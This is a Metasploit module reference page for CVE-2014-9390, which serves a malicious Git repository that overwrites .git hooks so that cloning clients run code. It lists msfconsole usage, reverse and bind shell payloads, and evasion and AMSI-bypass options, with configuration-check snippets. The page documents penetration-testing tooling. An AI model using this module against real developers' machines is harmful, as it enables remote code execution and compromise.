Malicious Git and Mercurial HTTP Server For CVE-2014-9390 - Metasploit
This page contains detailed information about how to use the exploit/multi/http/git_client_command_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Malicious Git and Mercurial HTTP Server For CVE-2014-9390
Module: exploit/multi/http/git_client_command_exec
Source code: modules/exploits/multi/http/git_client_command_exec.rb
Disclosure date: 2014-12-18
Last modification time: 2022-01-23 15:28:32 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2014-9390
This module exploits CVE-2014-9390, which affects Git (versions less than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions less than 3.2.3) and describes three vulnerabilities. On operating systems which have case-insensitive file systems, like Windows and OS X, Git clients can be convinced to retrieve and overwrite sensitive configuration files in the .git directory which can allow arbitrary code execution if a vulnerable client can be convinced to perform certain actions (for example, a checkout) against a malicious Git repository. A second vulnerability with similar characteristics also exists in both Git and Mercurial clients, on HFS+ file systems (Mac OS X) only, where certain Unicode codepoints are ignorable. The third vulnerability with similar characteristics only affects Mercurial clients on Windows, where Windows "short names" (MS-DOS-compatible 8.3 format) are supported. Today this module only truly supports the first vulnerability (Git clients on case-insensitive file systems) but has the functionality to support the remaining two with a little work.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.
- screen-effects: Module may show something on the screen (Example: a window pops up).
Basic Usage
msf > use exploit/multi/http/git_client_command_exec
msf exploit(git_client_command_exec) > exploit
Go back to menu.
Msfconsole Usage
Here is how the multi/http/git_client_command_exec exploit module looks in the msfconsole:
msf6 > use exploit/multi/http/git_client_command_exec
msf6 exploit(multi/http/git_client_command_exec) > show info
Name: Malicious Git and Mercurial HTTP Server For CVE-2014-9390
Module: exploit/multi/http/git_client_command_exec
Platform:
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2014-12-18
Provided by:
Jon Hart <[email protected]>
Available targets:
Id Name
-- ----
0 Automatic
1 Windows Powershell
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
GIT true yes Exploit Git clients
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Description:
This module exploits CVE-2014-9390, which affects Git (versions less
than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions
less than 3.2.3) and describes three vulnerabilities. On operating
systems which have case-insensitive file systems, like Windows and
OS X, Git clients can be convinced to retrieve and overwrite
sensitive configuration files in the .git directory which can allow
arbitrary code execution if a vulnerable client can be convinced to
perform certain actions (for example, a checkout) against a
malicious Git repository. A second vulnerability with similar
characteristics also exists in both Git and Mercurial clients, on
HFS+ file systems (Mac OS X) only, where certain Unicode codepoints
are ignorable. The third vulnerability with similar characteristics
only affects Mercurial clients on Windows, where Windows "short
names" (MS-DOS-compatible 8.3 format) are supported. Today this
module only truly supports the first vulnerability (Git clients on
case-insensitive file systems) but has the functionality to support
the remaining two with a little work.
References:
https://nvd.nist.gov/vuln/detail/CVE-2014-9390
https://blog.rapid7.com/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial
http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html
http://article.gmane.org/gmane.linux.kernel/1853266
https://github.com/blog/1938-vulnerability-announced-update-your-git-clients
https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/
http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29
http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e
http://selenic.com/repo/hg-stable/rev/6dad422ecc5a
Module Options
This is a complete list of options available in the multi/http/git_client_command_exec exploit:
msf6 exploit(multi/http/git_client_command_exec) > show options
Module options (exploit/multi/http/git_client_command_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
GIT true yes Exploit Git clients
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
Advanced Options
Here is a complete list of advanced options supported by the multi/http/git_client_command_exec exploit:
msf6 exploit(multi/http/git_client_command_exec) > show advanced
Module advanced options (exploit/multi/http/git_client_command_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
GIT_HOOK post-checkout no The Git hook to use for exploitation
GIT_URI no The URI to use as the malicious Git instance (empty for random)
ListenerComm no The specific communication channel to use for this service
MERCURIAL false no Enable experimental Mercurial support
MERCURIAL_HOOK update no The Mercurial hook to use for exploitation
MERCURIAL_URI no The URI to use as the malicious Mercurial instance (empty for random)
Powershell::encode_final_payload false yes Encode final payload for -EncodedCommand
Powershell::encode_inner_payload false yes Encode inner payload for -EncodedCommand
Powershell::exec_in_place false yes Produce PSH without executable wrapper
Powershell::exec_rc4 false yes Encrypt PSH with RC4
Powershell::method reflection yes Payload delivery method (Accepted: net, reflection, old, msil)
Powershell::no_equals false yes Pad base64 until no "=" remains
Powershell::noninteractive true yes Execute powershell without interaction
Powershell::persist false yes Run the payload in a loop
Powershell::prepend_protections_bypass true yes Prepend AMSI/SBL bypass
Powershell::prepend_sleep no Prepend seconds of sleep
Powershell::remove_comspec false yes Produce script calling powershell directly
Powershell::strip_comments true yes Strip comments
Powershell::strip_whitespace false yes Strip whitespace
Powershell::sub_funcs false yes Substitute function names
Powershell::sub_vars true yes Substitute variable names
Powershell::wrap_double_quotes true yes Wraps the -Command argument in single quotes
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
SendRobots false no Return a robots.txt file if asked for one
URIHOST no Host to use in URI (useful for tunnels)
URIPORT no Port to use in URI (useful for tunnels)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the multi/http/git_client_command_exec module can exploit:
msf6 exploit(multi/http/git_client_command_exec) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
1 Windows Powershell
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/git_client_command_exec exploit:
msf6 exploit(multi/http/git_client_command_exec) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
1 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
2 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
3 payload/cmd/unix/reverse_bash normal No Unix Command Shell, Reverse TCP (/dev/tcp)
4 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
5 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
Evasion Options
Here is the full list of possible evasion options supported by the multi/http/git_client_command_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(multi/http/git_client_command_exec) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::chunked false no Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression none no Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::junk_headers false no Enable insertion of random junk HTTP headers
HTTP::no_cache false no Disallow the browser to cache HTTP content
HTTP::server_name Apache yes Configures the Server header of all outgoing replies
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Must specify at least one GIT and/or MERCURIAL
Here is a relevant code snippet related to the "Must specify at least one GIT and/or MERCURIAL" error message:
115: git: { files: {}, trigger: nil },
116: mercurial: { files: {}, trigger: nil }
117: }
118:
119: unless datastore['GIT'] || datastore['MERCURIAL']
120: fail_with(Failure::BadConfig, 'Must specify at least one GIT and/or MERCURIAL')
121: end
122:
123: setup_git
124: setup_mercurial
125:
GIT_URI must start with a /
Here is a relevant code snippet related to the "GIT_URI must start with a /" error message:
128:
129: def setup_git
130: return unless datastore['GIT']
131: # URI must start with a /
132: unless git_uri && git_uri =~ /^\//
133: fail_with(Failure::BadConfig, 'GIT_URI must start with a /')
134: end
135: # sanity check the malicious hook:
136: if datastore['GIT_HOOK'].blank?
137: fail_with(Failure::BadConfig, 'GIT_HOOK must not be blank')
138: end
GIT_HOOK must not be blank
Here is a relevant code snippet related to the "GIT_HOOK must not be blank" error message:
132: unless git_uri && git_uri =~ /^\//
133: fail_with(Failure::BadConfig, 'GIT_URI must start with a /')
134: end
135: # sanity check the malicious hook:
136: if datastore['GIT_HOOK'].blank?
137: fail_with(Failure::BadConfig, 'GIT_HOOK must not be blank')
138: end
139:
140: # In .git/hooks/ directory, specially named files are shell scripts that
141: # are executed when particular events occur. For example, if
142: # .git/hooks/post-checkout was an executable shell script, a git client
MERCURIAL_URI must start with a /
Here is a relevant code snippet related to the "MERCURIAL_URI must start with a /" error message:
206:
207: def setup_mercurial
208: return unless datastore['MERCURIAL']
209: # URI must start with a /
210: unless mercurial_uri && mercurial_uri =~ /^\//
211: fail_with(Failure::BadConfig, 'MERCURIAL_URI must start with a /')
212: end
213: # sanity check the malicious hook
214: if datastore['MERCURIAL_HOOK'].blank?
215: fail_with(Failure::BadConfig, 'MERCURIAL_HOOK must not be blank')
216: end
MERCURIAL_HOOK must not be blank
Here is a relevant code snippet related to the "MERCURIAL_HOOK must not be blank" error message:
210: unless mercurial_uri && mercurial_uri =~ /^\//
211: fail_with(Failure::BadConfig, 'MERCURIAL_URI must start with a /')
212: end
213: # sanity check the malicious hook
214: if datastore['MERCURIAL_HOOK'].blank?
215: fail_with(Failure::BadConfig, 'MERCURIAL_HOOK must not be blank')
216: end
217: # we fake the Mercurial HTTP protocol such that we are compliant as possible but
218: # also as simple as possible so that we don't have to support all of the protocol
219: # complexities. Taken from:
220: # http://mercurial.selenic.com/wiki/HttpCommandProtocol
Go back to menu.
Related Pull Requests
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #12949 Merged Pull Request: This fixes broken links to the community.rapid7.com blog
- #10828 Merged Pull Request: git submodule url exec (CVE-2018-17456)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7507 Merged Pull Request: Refactor arch/platform, refactor TLV XOR, add UUID to each packet, fix payload uuid/arch/platform tracking, and update everything to match
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #5822 Merged Pull Request: Fix #5659: Update CMD exploits payload compatibility options
- #5173 Merged Pull Request: fix fail_with errors
References
- CVE-2014-9390
- https://blog.rapid7.com/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial
- http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html
- http://article.gmane.org/gmane.linux.kernel/1853266
- https://github.com/blog/1938-vulnerability-announced-update-your-git-clients
- https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/
- http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29
- http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e
- http://selenic.com/repo/hg-stable/rev/6dad422ecc5a
See Also
Check also the following modules related to this module:
- exploit/multi/http/git_lfs_clone_command_exec
- exploit/multi/http/git_submodule_command_exec
- exploit/multi/http/git_submodule_url_exec
- auxiliary/scanner/http/git_scanner
- exploit/windows/http/git_lfs_rce
- exploit/linux/http/bitbucket_git_cmd_injection
- exploit/linux/http/github_enterprise_secret
- exploit/linux/http/gitlist_exec
- exploit/linux/http/sourcegraph_gitserver_sshcmd
- exploit/multi/http/gitea_git_fetch_rce
- exploit/multi/http/gitea_git_hooks_rce
- exploit/multi/http/gitlab_exif_rce
- exploit/multi/http/gitlab_file_read_rce
- exploit/multi/http/gitlab_shell_exec
- exploit/multi/http/gitlist_arg_injection
- exploit/multi/http/gitorious_graph
- exploit/multi/http/gogs_git_hooks_rce
- exploit/windows/browser/logitechvideocall_start
- exploit/windows/fileformat/digital_music_pad_pls
- exploit/windows/http/gitstack_rce
- auxiliary/admin/http/gitstack_rest
- auxiliary/scanner/http/cgit_traversal
- auxiliary/scanner/http/gitlab_graphql_user_enum
- auxiliary/scanner/http/gitlab_login
- auxiliary/scanner/http/gitlab_user_enum
- auxiliary/scanner/ssh/ssh_enum_git_keys
- post/osx/gather/gitignore
- auxiliary/client/hwbridge/connect
- auxiliary/client/iec104/iec104
- auxiliary/client/mms/send_mms
- auxiliary/client/sms/send_text
- auxiliary/client/smtp/emailer
- auxiliary/client/telegram/send_message
- exploit/multi/http/metasploit_webui_console_command_execution
Related Nessus plugins:
- FreeBSD : git -- Arbitrary command execution on case-insensitive filesystems (1d567278-87a5-11e4-879c-000c292ee6b8)
- GitHub for Windows < 2.6.5 .git/config Command Execution
- GitHub < 1.9.4 .git/config Command Execution (Mac OS X)
- Git for Windows .git/config Command Execution
- Microsoft Visual Studio .git\config Command Execution
- Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : git vulnerability (USN-2470-1)
- openSUSE Security Update : git (openSUSE-SU-2015:0159-1)
- Apple Xcode < 6.2 (Mac OS X)
- Mandriva Linux Security Advisory : git (MDVSA-2015:169)
- openSUSE Security Update : libgit2 (openSUSE-2015-288)
Authors
- Jon Hart <jon_hart[at]rapid7.com>
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.
